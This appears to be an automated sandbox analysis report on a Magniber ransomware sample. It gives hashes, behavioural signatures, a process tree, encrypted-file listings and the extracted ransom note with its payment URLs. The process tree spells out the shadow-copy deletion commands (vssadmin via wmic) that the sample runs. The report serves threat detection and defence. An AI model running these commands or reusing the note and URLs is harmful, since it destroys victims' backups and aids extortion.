Overview

overview

10

Static

static

10.exe

windows7_x64

10

10.exe

windows10_x64

10

Analysis

  • max time kernel
    106s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    22-06-2021 15:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    10.exe

  • Size

    21KB

  • MD5

    89dec4d6bfe84c184bba66cb88e9e9b1

  • SHA1

    9ef17ae9e70f9ce851a2460028da272d4828e270

  • SHA256

    2852f76a016cf31d51a7d59a77857bee6285f59c95d6bcb8cd83b83640adbb69

  • SHA512

    37f057cf49cc6e2626e6a3881898cff4d1956bfe73770f7bf35c0e2afbcd04f772eed88ea997eda74c402986d7d234f58269efe695a4a25eddfe7ded8e98a4c0

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://20fcec4066784a708aovlamrdt.5s4ixqul2enwxrqv.onion/ovlamrdt Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://20fcec4066784a708aovlamrdt.dayhit.xyz/ovlamrdt http://20fcec4066784a708aovlamrdt.bestep.cyou/ovlamrdt http://20fcec4066784a708aovlamrdt.ownhits.space/ovlamrdt http://20fcec4066784a708aovlamrdt.plughas.casa/ovlamrdt Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://20fcec4066784a708aovlamrdt.5s4ixqul2enwxrqv.onion/ovlamrdt

http://20fcec4066784a708aovlamrdt.dayhit.xyz/ovlamrdt

http://20fcec4066784a708aovlamrdt.bestep.cyou/ovlamrdt

http://20fcec4066784a708aovlamrdt.ownhits.space/ovlamrdt

http://20fcec4066784a708aovlamrdt.plughas.casa/ovlamrdt

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 9 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1244
    • C:\Users\Admin\AppData\Local\Temp\10.exe
      "C:\Users\Admin\AppData\Local\Temp\10.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:748
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1544
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1964
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1468
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:520
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2008
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
          PID:524
    • C:\Windows\system32\Dwm.exe
      "C:\Windows\system32\Dwm.exe"
      1⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1180
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:532
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
            PID:1572
      • C:\Windows\system32\taskhost.exe
        "taskhost.exe"
        1⤵
        • Modifies extensions of user files
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1120
        • C:\Windows\system32\notepad.exe
          notepad.exe C:\Users\Public\readme.txt
          2⤵
          • Opens file in notepad (likely ransom note)
          PID:1196
        • C:\Windows\system32\cmd.exe
          cmd /c "start http://20fcec4066784a708aovlamrdt.dayhit.xyz/ovlamrdt^&1^&44027677^&84^&381^&12"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:900
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" http://20fcec4066784a708aovlamrdt.dayhit.xyz/ovlamrdt&1&44027677&84&381&12
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1772
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:275457 /prefetch:2
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:2112
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1496
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1596
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2052
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2240
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
              PID:2408
        • C:\Windows\system32\cmd.exe
          cmd /c CompMgmtLauncher.exe
          1⤵
          • Process spawned unexpected child process
          • Suspicious use of WriteProcessMemory
          PID:2060
          • C:\Windows\system32\CompMgmtLauncher.exe
            CompMgmtLauncher.exe
            2⤵
              PID:2296
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                3⤵
                  PID:2516
            • C:\Windows\system32\cmd.exe
              cmd /c CompMgmtLauncher.exe
              1⤵
              • Process spawned unexpected child process
              • Suspicious use of WriteProcessMemory
              PID:2120
              • C:\Windows\system32\CompMgmtLauncher.exe
                CompMgmtLauncher.exe
                2⤵
                  PID:2268
              • C:\Windows\system32\cmd.exe
                cmd /c CompMgmtLauncher.exe
                1⤵
                • Process spawned unexpected child process
                • Suspicious use of WriteProcessMemory
                PID:2096
                • C:\Windows\system32\CompMgmtLauncher.exe
                  CompMgmtLauncher.exe
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2340
                  • C:\Windows\system32\wbem\wmic.exe
                    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                    3⤵
                      PID:2456
                • C:\Windows\system32\cmd.exe
                  cmd /c CompMgmtLauncher.exe
                  1⤵
                  • Process spawned unexpected child process
                  • Suspicious use of WriteProcessMemory
                  PID:2084
                  • C:\Windows\system32\CompMgmtLauncher.exe
                    CompMgmtLauncher.exe
                    2⤵
                      PID:2308
                      • C:\Windows\system32\wbem\wmic.exe
                        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                        3⤵
                          PID:2644
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:2704
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:2696
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:2720
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:2768
                    • C:\Windows\system32\vssvc.exe
                      C:\Windows\system32\vssvc.exe
                      1⤵
                        PID:2880

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\FA2WPLKQ.txt
                        MD5

                        56f4130314491e1fa05d0647e91845be

                        SHA1

                        a13d3c98f0c334313fa0f10ca68688d49be6e5e5

                        SHA256

                        ba7dcad6fda080eba4f97bae45dc8a31e16288e8c475d64263ddb0fe4a0e4f03

                        SHA512

                        4acc01aaa9c751e260dc1061ea0a128d7ed8b7337f659c4d169cb4dc24ce297bc120896a485a1ae0d36d96b72f09edb4499b6175845d7deb08b9244368b033f1

                        Download Submit

                      • C:\Users\Admin\Desktop\ConnectCompare.mov.ovlamrdt
                        MD5

                        237271bc5fb2ca047728db3906a9645f

                        SHA1

                        ccb2241e91a2fc5de84549ff73c58b054edbee86

                        SHA256

                        3c9e57f30a7c4ad46e5919fbba124b98a6496984ca0c9edadb840be8800a9aaf

                        SHA512

                        8abeb0dd796d1fbbb02f096b86d7975a66e65053e2944d3e336dcae3691dfe2adc6514d57023e6832c8d76cf3c54a6b7c76cdfaa0567e5edf895bf0363903192

                        Download Submit

                      • C:\Users\Admin\Desktop\DismountRestore.dib.ovlamrdt
                        MD5

                        2dc56067250298c1c88278a96bd2013b

                        SHA1

                        a15237f8de8ae0496eefb7aab3de5858a4b96a88

                        SHA256

                        0bf203c7000dd4200f5a05ab1bebc4be6d78e685326c70225fd9889ea3270583

                        SHA512

                        681e3fc6f8bc15e3e1e1e3f9106dab2d639f6aa8ebb41ab71b683496c6293361bde2263c7af3565e43cf5d99dc7b3033394f77a011f83ebd315e2293d04ca176

                        Download Submit

                      • C:\Users\Admin\Desktop\GetReset.mpeg.ovlamrdt
                        MD5

                        638718488dd58ded81e6565f799b31e4

                        SHA1

                        0d49d264209e757cee55e7434ea74f9a608b4c1e

                        SHA256

                        64d0a1043202a91aa9799461de455d3e4fae3b662e16b2ab48082649ef5a7486

                        SHA512

                        f826f91fe43aee8dca90d75ecb6aab343b167e5b016c750a01d1f246f113b99a1296ae480072fd69cd125d7858b59526e560343eafbac5786c4db6ac929700de

                        Download Submit

                      • C:\Users\Admin\Desktop\JoinConnect.png.ovlamrdt
                        MD5

                        e60836f34f56f9dec6dc7aad10827c8b

                        SHA1

                        faf1d77c26d781cdc7ac50e4eb2f362df6eb98a7

                        SHA256

                        e4b4277054215fd742109a651694753ae8320cb2ffe2b925a172c729a3b7f8c5

                        SHA512

                        a66953bc92752081f67d5013bcd550e6c53a9a6c9f86fcafa9d6fb22276523c61d667183cb849c99721d06c3dc995c99c8c7bfef7e7c6885b94090055004716c

                        Download Submit

                      • C:\Users\Admin\Desktop\RemoveHide.wma.ovlamrdt
                        MD5

                        d98db251e4da5b7d6f11825cc20695dd

                        SHA1

                        aaf39f34cf0cf8795ec3202012120f1ca16942c9

                        SHA256

                        cabca5cdba249e0d21488b2069242a92187a0734fe128f78596079f2e4f683a0

                        SHA512

                        e149e206c286b8a6c56fe921bd999fd0214f7f3e1ab83b50c271a953a89d491326c266c446b6895ddb6a2e0e1e5554f05341599652fa3947d1a0956b0e20ced6

                        Download Submit

                      • C:\Users\Admin\Desktop\RestartConvertTo.dot.ovlamrdt
                        MD5

                        0491cb5ce78a3c5550cb8fe45ff4ec3f

                        SHA1

                        e4b8ad27029101e16a61ee60eccef69d6ccbf3a8

                        SHA256

                        c65e5e0c8ec3b0b1ab7c57fdf1305d452ca13ed9943cce1fc66e2120907b9ffa

                        SHA512

                        9f844b4e7e683fc27b623d605c700afe24fec80a67fcc061512abd45c8a402a0527d5c9e1bd7d3a8fa35dbba1b0a7cc95964557370652a842a197982f019256e

                        Download Submit

                      • C:\Users\Admin\Desktop\RestoreEdit.xlsb.ovlamrdt
                        MD5

                        2f91bd70db9ae20bb4073a1f62a6007f

                        SHA1

                        c28a3c8fa7ce0b304d4b29e24e0b3a62cc19697b

                        SHA256

                        97701fc5ac9b15eb9eab63f82418b436761ce8f6a4e09ff4faf920be35a0fe84

                        SHA512

                        d4c326b66b23e4cf0e688b246b18763f3e37de03cc3b68389a4a3bd00480313104b134d441bd9a24597e80734fdc0b449fce4a6e8324b59932a6bd3b1b4d2362

                        Download Submit

                      • C:\Users\Admin\Desktop\RestoreMeasure.odt.ovlamrdt
                        MD5

                        acadf9ff0abb60e346bddceedfc901de

                        SHA1

                        e54b431b5958719cdd378ef21c0472819a2a02ca

                        SHA256

                        62dfeefa7da1a14186ce6ac41de519688ef7b70cfbe94240f44fdc46157fc314

                        SHA512

                        0f41443103d3c6b9e83ea4fd4498bc71f33e7bdd89593a100b77752bb359bfa8c082ce16d2ad7ac56625b8ee291e8fd9fc85329c227d5af12c17de86d3826576

                        Download Submit

                      • C:\Users\Admin\Desktop\SetSwitch.wma.ovlamrdt
                        MD5

                        ef97da0119fd4a6c76e21e648197e1f9

                        SHA1

                        68e32ea1cbca7bdd75dc5432aa37c75e919da753

                        SHA256

                        76319fa6c81ed86b50e58e8661b5dca58ec801e02caeb204472ed8e1483d002f

                        SHA512

                        95180319aeca3406a53941514fc191edf4c277e7d382daa596e5882ebcb28377fd74d6450d6a5c2642352ef0154249f58a9664cea50da76e970349da7c2214b2

                        Download Submit

                      • C:\Users\Admin\Desktop\SkipDebug.vb.ovlamrdt
                        MD5

                        e9c7a634791e2b09f1566b2e274411f9

                        SHA1

                        f5082b00252bcc99f1cb8ac1e44f24c68fad0b8d

                        SHA256

                        c902fa4b27f367f1494812afed8c38130ad2106c0f24ba805df593f98461e1c7

                        SHA512

                        f9acea0e9d1f28ae8d113e999492821f8f7091ccd2a5cd4463e05c71580289e973bdcdc55d214f348ed3796c738fbb48aad9d3a5e3cfb78cad33789e0bb91ff6

                        Download Submit

                      • C:\Users\Admin\Desktop\readme.txt
                        MD5

                        c69c28204e02cc6f40360c62109674a3

                        SHA1

                        029b309ae902f20d5c8ee1e3d1ca6a58ab96c856

                        SHA256

                        df848f49f20a09f5ff0333ddd157f761ea8082f51ae73b0ee110d0de80c5fbf0

                        SHA512

                        ba657f0b93ad1459dd3736a27ac46ae69cdb56729896890669f065d8e25168d236a293ef89ca7080c42717dba983f563fbc5b2aa3fd7ff2fa14cf3fea5d0150b

                        Download Submit

                      • C:\Users\Public\readme.txt
                        MD5

                        c69c28204e02cc6f40360c62109674a3

                        SHA1

                        029b309ae902f20d5c8ee1e3d1ca6a58ab96c856

                        SHA256

                        df848f49f20a09f5ff0333ddd157f761ea8082f51ae73b0ee110d0de80c5fbf0

                        SHA512

                        ba657f0b93ad1459dd3736a27ac46ae69cdb56729896890669f065d8e25168d236a293ef89ca7080c42717dba983f563fbc5b2aa3fd7ff2fa14cf3fea5d0150b

                        Download Submit

                      • \??\PIPE\srvsvc
                        MD5

                        d41d8cd98f00b204e9800998ecf8427e

                        SHA1

                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                        SHA256

                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                        SHA512

                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                        Download Submit

                      • memory/520-150-0x0000000000000000-mapping.dmp

                        Download

                      • memory/524-151-0x0000000000000000-mapping.dmp

                        Download

                      • memory/532-141-0x0000000000000000-mapping.dmp

                        Download

                      • memory/748-92-0x0000000001D00000-0x0000000001D01000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/748-94-0x0000000001D20000-0x0000000001D21000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/748-89-0x0000000001CC0000-0x0000000001CC1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/748-62-0x0000000000080000-0x0000000000081000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/748-90-0x0000000001CD0000-0x0000000001CD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/748-61-0x0000000000020000-0x0000000000025000-memory.dmp

                        Filesize

                        20KB

                        Download

                      • memory/748-93-0x0000000001D10000-0x0000000001D11000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/748-88-0x0000000001CB0000-0x0000000001CB1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/748-65-0x0000000001B40000-0x0000000001B41000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/748-63-0x0000000000090000-0x0000000000091000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/748-95-0x0000000001D30000-0x0000000001D31000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/748-64-0x0000000001B30000-0x0000000001B31000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/900-139-0x0000000000000000-mapping.dmp

                        Download

                      • memory/1120-97-0x0000000000220000-0x0000000000224000-memory.dmp

                        Filesize

                        16KB

                        Download

                      • memory/1196-137-0x000007FEFB561000-0x000007FEFB563000-memory.dmp

                        Filesize

                        8KB

                        Download

                      • memory/1196-132-0x0000000000000000-mapping.dmp

                        Download

                      • memory/1244-60-0x0000000002700000-0x0000000002710000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/1468-147-0x0000000000000000-mapping.dmp

                        Download

                      • memory/1496-140-0x0000000000000000-mapping.dmp

                        Download

                      • memory/1544-142-0x0000000000000000-mapping.dmp

                        Download

                      • memory/1572-144-0x0000000000000000-mapping.dmp

                        Download

                      • memory/1596-145-0x0000000000000000-mapping.dmp

                        Download

                      • memory/1772-146-0x0000000000000000-mapping.dmp

                        Download

                      • memory/1964-148-0x0000000000000000-mapping.dmp

                        Download

                      • memory/2008-149-0x0000000000000000-mapping.dmp

                        Download

                      • memory/2112-152-0x0000000000000000-mapping.dmp

                        Download

                      • memory/2112-153-0x0000000075041000-0x0000000075043000-memory.dmp

                        Filesize

                        8KB

                        Download

                      • memory/2240-154-0x0000000000000000-mapping.dmp

                        Download

                      • memory/2268-156-0x0000000000000000-mapping.dmp

                        Download

                      • memory/2296-158-0x0000000000000000-mapping.dmp

                        Download

                      • memory/2308-159-0x0000000000000000-mapping.dmp

                        Download

                      • memory/2340-160-0x0000000000000000-mapping.dmp

                        Download

                      • memory/2408-164-0x0000000000000000-mapping.dmp

                        Download

                      • memory/2456-165-0x0000000000000000-mapping.dmp

                        Download

                      • memory/2516-167-0x0000000000000000-mapping.dmp

                        Download

                      • memory/2644-168-0x0000000000000000-mapping.dmp

                        Download